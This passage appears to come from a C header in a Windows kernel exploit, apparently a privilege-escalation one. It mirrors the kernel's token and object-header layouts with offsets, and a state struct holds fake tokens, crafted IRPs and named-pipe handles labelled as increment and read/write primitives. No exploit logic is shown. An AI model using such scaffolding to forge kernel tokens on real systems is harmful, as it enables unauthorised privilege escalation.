    struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0
    VOID* PrimaryGroup; //0xa8
    ULONG* DynamicPart; //0xb0
    struct _ACL* DefaultDacl; //0xb8
    enum _TOKEN_TYPE TokenType; //0xc0
    enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4
    ULONG TokenFlags; //0xc8
    UCHAR TokenInUse; //0xcc
    ULONG IntegrityLevelIndex; //0xd0
    ULONG MandatoryPolicy; //0xd4
    void* LogonSession; //0xd8
    struct _LUID OriginatingLogonSession; //0xe0
    struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8
    struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8
    struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION*
pSecurityAttributes; //0x308
    VOID* Package; //0x310
    struct _SID_AND_ATTRIBUTES* Capabilities; //0x318
    ULONG CapabilityCount; //0x320
    struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328
    struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438
    struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440
    struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes;
//0x448
    VOID* TrustLevelSid; //0x450
    struct _TOKEN* TrustLinkedToken; //0x458
    VOID* IntegrityLevelSidValue; //0x460
    struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468
    struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470
    struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478
    struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480
    VOID* SessionObject; //0x488
    // Start of the variable-length tail (OFFSET_IN_TOKEN_VARIABLEPART above).
    ULONGLONG VariablePart; //0x490
};

//0x38 bytes (sizeof)
// Mirror of the kernel _OBJECT_HEADER that precedes every object body. The
// "0x38 bytes" above describes the header portion only: unlike the kernel
// definition (where Body is an 8-byte QUAD placeholder), this version embeds a
// full struct _TOKEN as Body, so sizeof(_OBJECT_HEADER) here is 0x30 + sizeof(_TOKEN).
// struct mm below tracks that combined size as sizeOfClientTokenAndObjectHeader.
struct _OBJECT_HEADER
{
    LONGLONG PointerCount; //0x0
    union
    {
        LONGLONG HandleCount; //0x8
        VOID* NextToFree; //0x8
    };
    struct _EX_PUSH_LOCK Lock; //0x10
    UCHAR TypeIndex; //0x18
    union
    {
        UCHAR TraceFlags; //0x19
        struct
        {
            UCHAR DbgRefTrace : 1; //0x19
            UCHAR DbgTracePermanent : 1; //0x19
        };
    };
    UCHAR InfoMask; //0x1a
    union
    {
        UCHAR Flags; //0x1b
        struct
        {
            UCHAR NewObject : 1; //0x1b
            UCHAR KernelObject : 1; //0x1b
            UCHAR KernelOnlyAccess : 1; //0x1b
            UCHAR ExclusiveObject : 1; //0x1b
            UCHAR PermanentObject : 1; //0x1b
            UCHAR DefaultSecurityQuota : 1; //0x1b
            UCHAR SingleHandleEntry : 1; //0x1b
            UCHAR DeletedInline : 1; //0x1b
        };
    };
    ULONG Reserved; //0x1c
    union
    {
        struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20
        VOID* QuotaBlockCharged; //0x20
    };
    VOID* SecurityDescriptor; //0x28
    // Object body laid out inline as a token (see note above).
    struct _TOKEN Body; //0x30
};

// Shared state bag for the rest of the program: user-mode copies of the crafted
// kernel structures declared above, scratch buffers, and the pipe/file/token
// handles the code works with. Nothing in this file shows who allocates or
// releases these members — ownership and the free/CloseHandle path must be
// checked in the code that uses them.
struct mm {
    void* fake_data_entry;
    void* input;
    _IRP* crafted_irp;
    IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;
    void* p_mem_0x30;
    void* p_mem_0xD0_2;
    _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;
    ACL* VariablePartDefaultDacl;
    ACL* VariablePartDefaultDacl2;
    _ERESOURCE* TokenLock;
    void* PrimaryGroup;
    // Size of an _OBJECT_HEADER with its inline _TOKEN body (see that struct).
    int sizeOfClientTokenAndObjectHeader;
    PSEP_SID_VALUES_BLOCK TokenSidValues;
    _SECURITY_CLIENT_CONTEXT* security_client_context;
    _SEP_LOGON_SESSION_REFERENCES* LogonSession;
    _TOKEN* fakeToken;
    void *pipe_100_im_control_block;
    void* pipe_100_rw_control_block;
    void* p_mem_Pipe_hToPipe_1000_rw;
    void* p_mem_Pipe_hToPipe_1000_rw_2;
    // Named-pipe and file handles; IM/RW suffixes pair the two pipe instances.
    HANDLE hPipeIM;
    HANDLE hPipeRW;
    HANDLE hFileIM;
    HANDLE hFileRW;
    HANDLE IncPrimitiveTOKEN;
    HANDLE RWPrimitiveTOKEN;
};

//0x18 bytes (sizeof)
struct _DISPATCHER_HEADER
{
    union
    {
        volatile LONG Lock; //0x0
        LONG LockNV; //0x0
        struct
        {
            UCHAR Type; //0x0
            UCHAR Signalling; //0x1
            UCHAR Size; //0x2
            UCHAR Reserved1; //0x3
        };
        struct
        {
            UCHAR TimerType; //0x0
            union
            {
                UCHAR TimerControlFlags; //0x1
                struct
                {
                    UCHAR Absolute : 1;